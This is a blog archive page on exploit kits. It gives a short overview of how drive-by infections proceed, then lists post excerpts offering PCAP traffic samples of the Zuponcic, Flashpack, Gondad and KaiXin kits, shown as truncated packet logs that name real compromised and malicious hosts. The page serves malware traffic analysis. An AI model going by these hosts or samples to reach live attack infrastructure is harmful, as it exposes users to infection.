Category Archives: Exploit Kits

Exploit kits are a type of malicious toolkit used to exploit security holes found in software applications (Adobe Reader, etc) for the purpose of spreading malware. These kits come with pre-written exploit code and target users running insecure or outdated software applications on their computers. While the process of becoming exploited by one of these kits will vary, the procedure usually goes a bit like this:

A victim visits a website whose server has been hacked by cybercriminals.
The victim is redirected through various intermediary servers
The victim lands at a rogue server hosting the exploit kit
The exploit kit gathers information on the victim and determines the exploit to deliver
Exploit is delivered
If exploit succeeds, a malicious payload (custom malware program) is downloaded to the victim’s computer and executed.

RARE Zuponcic Exploit Kit Traffic Sample Devlivers Adware:SanctionedMedia PCAP Download

Download this rare PCAP : zuponcic   Adware:MSIL/SanctionedMedia is a specific detection used by Microsoft Security Essentials,Windows Defender and other antivirus products to indicate and detect a Potentially Unwanted Program. A potentially unwanted application is a program that contains adware, installs toolbars or has other unclear objectives. Adware:MSIL/SanctionedMedia it’s technically not a virus, but it does… Read More »

Share Button

Detailed Analysis of the processes and stages of an Exploit Kit – Java and IE exploited by Flashpack Web Based Kit

Here you can see the webpage that the hackers exploited (arksylhet.com/A67iD4eo/index.html) and inserted within that page an iframe which includes a link to a Javascript Redirect file   2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394 E…*.@…….j.\+lF…P7_Z.X.X.P….?..GET /Lk1SsGQm/js.js HTTP/1.1 Host: web63.server77.publicompserver.de User-Agent: Mozilla/5.0 (Windows; U; Windows NT… Read More »

Share Button

PCAP Converted Traffic Sample Gondad Exploit Kit

2014-12-13 16:53:26.092318 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [.], ack 1, win 64240, length 0 E..().@…D…..n-.]. .P..u.@. .P…u,…….. 2014-12-13 16:53:26.093193 IP 192.168.204.137.49673 > 110.45.146.93.80: Flags [P.], seq 1:549, ack 1, win 64240, length 548 E..L).@…A…..n-.]. .P..u.@. .P….j..GET / HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.bing[.]com/search?q=gilsangart[.]com&src=IE-SearchBox&FORM=IE8SRC Accept-Language: en-US User-Agent: Mozilla/4.0… Read More »

Share Button

Gondad EK Exploit Kit using QQ.com Malware Infection PCAP Traffic Sample

2014-12-13 21:12:18.365748 IP 192.168.56.101.1389 > 8.8.8.8.53: 37206+ A? r.qzone.qq.com. (32) E..<……(…8e…..m.5.(*..V………..r.qzone.qq.com….. 2014-12-13 21:12:18.426615 IP 8.8.8.8.53 > 192.168.56.101.1389: 37206 4/0/0 CNAME qq.com.edgesuite.net., CNAME a1574.b.akamai.net., A 23.61.194.48, A 23.61.194.216 (127) E…….9..|……8e.5.m..^..V………..r.qzone.qq.com…………..W…qq.com edgesuite.net..,……J….a1574.b.akamai.=.N………..=.0.N………..=.. 2014-12-13 21:12:18.431687 IP 192.168.56.101.1040 > 23.61.194.48.80: Flags [S], seq 759589942, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0..@…….8e.=.0…P-Fl6….p…………… 2014-12-13 21:12:18.435525 IP 23.61.194.48.80 > 192.168.56.101.1040: Flags… Read More »

Share Button

KaiXin Failed Exploit Kit Attack PCAP Traffic Sample

2015-01-02 20:50:37.883125 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [P.], seq 1:459, ack 1, win 64240, length 458 E…..@………w……P…>8…P…U…POST /tj.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.568bar[.]com/tj.asp Accept-Language: zh-cn Content-Length: 16 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.568bar[.]com Cache-Control: no-cache yz=1314&uz=1&jc= 2015-01-02 20:50:38.059030 IP 119.147.137.128.80 >… Read More »

Share Button